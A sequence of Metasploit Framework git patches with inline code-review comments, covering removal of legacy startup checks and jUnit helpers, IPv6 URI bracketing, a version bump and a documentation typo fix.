From: Brent Cook Date: Mon, 4 Dec 2017 22:27:21 -0600 Subject: [PATCH 250/254] remove some unneeded backward-compat code --- lib/msf/core.rb | 3 +- lib/msf/sanity.rb | 28 -------- lib/msf/ui/console/driver.rb | 133 ++--------------------------------- 3 files changed, 5 insertions(+), 159 deletions(-) delete mode 100644 lib/msf/sanity.rb diff --git a/lib/msf/core.rb b/lib/msf/core.rb index 881836e7f9..6eca2772ce 100644 --- a/lib/msf/core.rb +++ b/lib/msf/core.rb @@ -10,8 +10,7 @@ # ### -# Sanity check this version of ruby -require 'msf/sanity' +# Include backported features for older versions of Ruby require 'backports' # The framework-core depends on Rex diff --git a/lib/msf/sanity.rb b/lib/msf/sanity.rb deleted file mode 100644 index dc5ef2696d..0000000000 --- a/lib/msf/sanity.rb +++ /dev/null @@ -1,28 +0,0 @@ -# -*- coding: binary -*- -# -# Provides some sanity checks against the ruby build and version -# - -if(RUBY_PLATFORM == 'java') - require 'socket' - s = Socket.new(::Socket::AF_INET, ::Socket::SOCK_STREAM, ::Socket::IPPROTO_TCP) - if(not s.respond_to?('bind')) - $stderr.puts "*** JRuby 1.5.0+ is required to use Metasploit with jRuby" - exit(0) - end - - $stderr.puts "*** Warning: JRuby support is still incomplete, few things will work properly!" - trap Signal::list['INT'] do - Thread.main.raise Interrupt.new - end - - s.close -end - -# Check for OpenSSL and print a warning if it is not installed -begin - require 'openssl' -rescue ::LoadError - $stderr.puts "*** The ruby-openssl library is not installed, many features will be disabled!" - $stderr.puts "*** Examples: Meterpreter, SSL Sockets, SMB/NTLM Authentication, and more" -end diff --git a/lib/msf/ui/console/driver.rb b/lib/msf/ui/console/driver.rb index 1e303bf4ee..fd53c3278b 100644 --- a/lib/msf/ui/console/driver.rb +++ b/lib/msf/ui/console/driver.rb 
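Review bot: Dropping `require 'msf/sanity'` removes the startup check that reported a missing `openssl` library with a readable message, and the driver.rb hunk in this same patch removes the equivalent `begin require 'openssl' rescue ::LoadError` block, so after this change a Ruby without OpenSSL fails later with a bare LoadError from whichever component touches it first. If OpenSSL is now considered mandatory, a plain `require 'openssl'` next to `require 'backports'` would keep the failure early and obvious; if it is still optional, one of the two warnings should survive. Whether any other load path still reports this is outside the hunk, so this is hedged.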
@@ -138,15 +138,6 @@ class Driver < Msf::Ui::Driver
 print_error("***")
 end
- begin
- require 'openssl'
- rescue ::LoadError
- print_error("***")
- print_error("* WARNING: No OpenSSL support. This is required by meterpreter payloads and many exploits")
- print_error("* Please install the ruby-openssl package (apt-get install libopenssl-ruby on Debian/Ubuntu")
- print_error("***")
- end
-
 # Register event handlers
 register_event_handlers
@@ -191,24 +182,10 @@ class Driver < Msf::Ui::Driver
 end
 end
- # framework.db.active will be true if after_establish_connection ran directly when connection_established? was
- # already true or if framework.db.connect called after_establish_connection.
- if !! framework.db.error
- if framework.db.error.to_s =~ /RubyGem version.*pg.*0\.11/i
- print_error("***")
- print_error("*")
- print_error("* Metasploit now requires version 0.11 or higher of the 'pg' gem for database support")
- print_error("* There a three ways to accomplish this upgrade:")
- print_error("* 1. If you run Metasploit with your system ruby, simply upgrade the gem:")
- print_error("* $ rvmsudo gem install pg ")
- print_error("* 2. Use the Community Edition web interface to apply a Software Update")
- print_error("* 3. Uninstall, download the latest version, and reinstall Metasploit")
- print_error("*")
- print_error("***")
- print_error("")
- print_error("")
- end
-
+ # framework.db.active will be true if after_establish_connection ran
+ # directly when connection_established? was already true or if
+ # framework.db.connect called after_establish_connection.
+ if !!framework.db.error
 print_error("Failed to connect to the database: #{framework.db.error}")
 end
 end
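Review bot: The rewritten condition `if !!framework.db.error` keeps a redundant double negation — `if` already tests truthiness, so `if framework.db.error` is equivalent and is what RuboCop's Style/DoubleNegation flags. The reflowed comment above it explains when `framework.db.active` is true, but the code it now precedes only checks `framework.db.error`, so the comment no longer describes the line below it; a comment grounded in what the branch does, e.g. `# Surface a failed database connection on the console.`, would fit better, with the `active` explanation moved to wherever `active` is actually consulted. The enclosing method starts and ends outside both hunks.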
@@ -250,108 +227,6 @@ class Driver < Msf::Ui::Driver end end - # - # Configure a default output path for jUnit XML output - # - def junit_setup(output_path) - output_path = ::File.expand_path(output_path) - - ::FileUtils.mkdir_p(output_path) - @junit_output_path = output_path - @junit_error_count = 0 - print_status("Test Output: #{output_path}") - - # We need at least one test success in order to pass - junit_pass("framework_loaded") - end - - # - # Emit a new jUnit XML output file representing an error - # - def junit_error(tname, ftype, data = nil) - - if not @junit_output_path - raise RuntimeError, "No output path, call junit_setup() first" - end - - data ||= framework.inspect.to_s - - e = REXML::Element.new("testsuite") - - c = REXML::Element.new("testcase") - c.attributes["classname"] = "msfrc" - c.attributes["name"] = tname - - f = REXML::Element.new("failure") - f.attributes["type"] = ftype - - f.text = data - c << f - e << c - - bname = ("msfrpc_#{tname}").gsub(/[^A-Za-z0-9\.\_]/, '') - bname << "_" + Digest::MD5.hexdigest(tname) - - fname = ::File.join(@junit_output_path, "#{bname}.xml") - cnt = 0 - while ::File.exist?( fname ) - cnt += 1 - fname = ::File.join(@junit_output_path, "#{bname}_#{cnt}.xml") - end - - ::File.open(fname, "w") do |fd| - fd.write(e.to_s) - end - - print_error("Test Error: #{tname} - #{ftype} - #{data}") - end - - # - # Emit a new jUnit XML output file representing a success - # - def junit_pass(tname) - - if not @junit_output_path - raise RuntimeError, "No output path, call junit_setup() first" - end - - # Generate the structure of a test case run - e = REXML::Element.new("testsuite") - c = REXML::Element.new("testcase") - c.attributes["classname"] = "msfrc" - c.attributes["name"] = tname - e << c - - # Generate a unique name - bname = ("msfrpc_#{tname}").gsub(/[^A-Za-z0-9\.\_]/, '') - bname << "_" + Digest::MD5.hexdigest(tname) - - # Generate the output path, allow multiple test with the same name - fname = 
::File.join(@junit_output_path, "#{bname}.xml") - cnt = 0 - while ::File.exist?( fname ) - cnt += 1 - fname = ::File.join(@junit_output_path, "#{bname}_#{cnt}.xml") - end - - # Write to our test output location, as specified with junit_setup - ::File.open(fname, "w") do |fd| - fd.write(e.to_s) - end - - print_good("Test Pass: #{tname}") - end - - - # - # Emit a jUnit XML output file and throw a fatal exception - # - def junit_fatal_error(tname, ftype, data) - junit_error(tname, ftype, data) - print_error("Exiting") - run_single("exit -y") - end - # # Loads configuration that needs to be analyzed before the framework # instance is created. From 912fbc3b8ca45db1d1edcedc00b98bb21a103439 Mon Sep 17 00:00:00 2001 From: Christian Mehlmauer Date: Wed, 6 Dec 2017 20:34:40 +0100 Subject: [PATCH 251/254] add docker pull badge to readme --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 16b401ac91..849f6107cd 100644 --- a/README.md +++ b/README.md @@ -1,4 +1,4 @@ -Metasploit [![Build Status](https://travis-ci.org/rapid7/metasploit-framework.svg?branch=master)](https://travis-ci.org/rapid7/metasploit-framework) [![Code Climate](https://img.shields.io/codeclimate/github/rapid7/metasploit-framework.svg)](https://codeclimate.com/github/rapid7/metasploit-framework) +Metasploit [![Build Status](https://travis-ci.org/rapid7/metasploit-framework.svg?branch=master)](https://travis-ci.org/rapid7/metasploit-framework) [![Code Climate](https://img.shields.io/codeclimate/github/rapid7/metasploit-framework.svg)](https://codeclimate.com/github/rapid7/metasploit-framework) [![Docker Pulls](https://img.shields.io/docker/pulls/metasploitframework/metasploit-framework.svg)](https://hub.docker.com/r/metasploitframework/metasploit-framework/) == The Metasploit Framework is released under a BSD-style license. See COPYING for more details. From 2565ad6a27a3dac7367f22dc836fe66d41bfaaeb Mon Sep 17 00:00:00 2001 
From: William Vu
Date: Thu, 7 Dec 2017 12:56:55 -0600
Subject: [PATCH 252/254] Handle IPv6 addresses in full_uri (add brackets)
---
 lib/msf/core/exploit/http/client.rb | 8 +++++++-
 1 file changed, 7 insertions(+), 1 deletion(-)
diff --git a/lib/msf/core/exploit/http/client.rb b/lib/msf/core/exploit/http/client.rb
index daa6ac6f83..a7194c8bb1 100644
--- a/lib/msf/core/exploit/http/client.rb
+++ b/lib/msf/core/exploit/http/client.rb
@@ -474,7 +474,13 @@ module Exploit::Remote::HttpClient
 uri = normalize_uri(custom_uri || target_uri.to_s)
- "#{uri_scheme}://#{rhost}#{uri_port}#{uri}"
+ if Rex::Socket.is_ipv6?(rhost)
+ uri_host = "[#{rhost}]"
+ else
+ uri_host = rhost
+ end
+
+ "#{uri_scheme}://#{uri_host}#{uri_port}#{uri}"
 end
 #
From 348cbe54b6f56b0dce406da4512d2bfdf6059913 Mon Sep 17 00:00:00 2001
From: Metasploit
Date: Fri, 8 Dec 2017 10:01:55 -0800
Subject: [PATCH 253/254] Bump version of framework to 4.16.23
---
 Gemfile.lock | 6 +++---
 lib/metasploit/framework/version.rb | 2 +-
 2 files changed, 4 insertions(+), 4 deletions(-)
diff --git a/Gemfile.lock b/Gemfile.lock
index 02a3d0af4e..5005305830 100644
--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -1,7 +1,7 @@
 PATH
 remote: .
 specs:
- metasploit-framework (4.16.22)
+ metasploit-framework (4.16.23)
 actionpack (~> 4.2.6)
 activerecord (~> 4.2.6)
 activesupport (~> 4.2.6)
@@ -138,7 +138,7 @@ GEM
 multi_json (~> 1.11)
 os (~> 0.9)
 signet (~> 0.7)
- grpc (1.7.2)
+ grpc (1.7.3)
 google-protobuf (~> 3.1)
 googleapis-common-protos-types (~> 1.0.0)
 googleauth (>= 0.5.1, < 0.7)
@@ -193,7 +193,7 @@ GEM
 method_source (0.9.0)
 mini_portile2 (2.3.0)
 minitest (5.10.3)
- msgpack (1.1.0)
+ msgpack (1.2.0)
 multi_json (1.12.2)
 multipart-post (2.0.0)
 nessus_rest (0.1.6)
diff --git a/lib/metasploit/framework/version.rb b/lib/metasploit/framework/version.rb
index ce52cf1258..22c37e115b 100644
--- a/lib/metasploit/framework/version.rb
+++ b/lib/metasploit/framework/version.rb
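Review bot: The five-line `if`/`else` that only selects a host string would read better as one conditional assignment, `uri_host = Rex::Socket.is_ipv6?(rhost) ? "[#{rhost}]" : rhost`, which also avoids first assigning `uri_host` inside a branch. Because this string is what every caller of `full_uri` receives, a spec asserting the bracketed form for an IPv6 `RHOST` (e.g. `::1` producing `http://[::1]` followed by the port and path) would pin the new behaviour. I cannot see from the hunk whether `rhost` can already arrive bracketed; if it can, `is_ipv6?` presumably returns false for that form and the value passes through unchanged, which is worth confirming rather than assuming. The enclosing method `full_uri` starts outside the hunk.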
@@ -30,7 +30,7 @@ module Metasploit
 end
 end
- VERSION = "4.16.22"
+ VERSION = "4.16.23"
 MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i }
 PRERELEASE = 'dev'
 HASH = get_hash
From 3a14ac3b37ebcdf7cb4e0bf5424190e1eb9d7c0c Mon Sep 17 00:00:00 2001
From: Chris Higgins
Date: Sat, 9 Dec 2017 02:30:42 -0600
Subject: [PATCH 254/254] Fixed a spelling error in documentation
---
 .../modules/exploit/windows/smtp/sysgauge_client_bof.md | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/documentation/modules/exploit/windows/smtp/sysgauge_client_bof.md b/documentation/modules/exploit/windows/smtp/sysgauge_client_bof.md
index d422147189..467f8c3603 100644
--- a/documentation/modules/exploit/windows/smtp/sysgauge_client_bof.md
+++ b/documentation/modules/exploit/windows/smtp/sysgauge_client_bof.md
@@ -4,7 +4,7 @@ via its SMTP server validation. The module sends a malicious response along
 in the 220 service ready response and exploits the client, resulting in an
 unprivileged shell.
- he software is available for download from [SysGauge](http://www.sysgauge.com/setups/sysgauge_setup_v1.5.18.exe).
+ The software is available for download from [SysGauge](http://www.sysgauge.com/setups/sysgauge_setup_v1.5.18.exe).
 ## Verification Steps